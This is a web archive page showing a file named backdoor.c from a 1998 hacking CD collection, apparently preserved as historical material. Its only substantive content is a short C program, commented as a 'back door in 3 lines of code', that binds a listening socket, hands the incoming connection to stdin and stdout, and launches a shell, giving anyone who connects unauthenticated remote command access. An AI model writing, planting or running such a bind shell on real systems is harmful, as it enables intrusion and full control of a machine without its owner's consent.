home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Hacker's Encyclopedia 1998
/
hackers_encyclopedia.iso
/
hacking
/
general
/
backdoor.c
< prev
next >
Encoding:
Amiga
Atari
Commodore
DOS
FM Towns/JPY
Macintosh
Macintosh JP
NeXTSTEP
RISC OS/Acorn
Shift JIS
UTF-8
Wrap
C/C++ Source or Header
|
2003-06-11
|
179 b
|
13 lines
/* Back door in 3 lines of code. */
short a[9];
main(){
a[1]=8738;
dup2(dup2(accept(3,listen(3,1),bind(socket(*a=2,1,0),a,16)),0),1);
system("sh");
}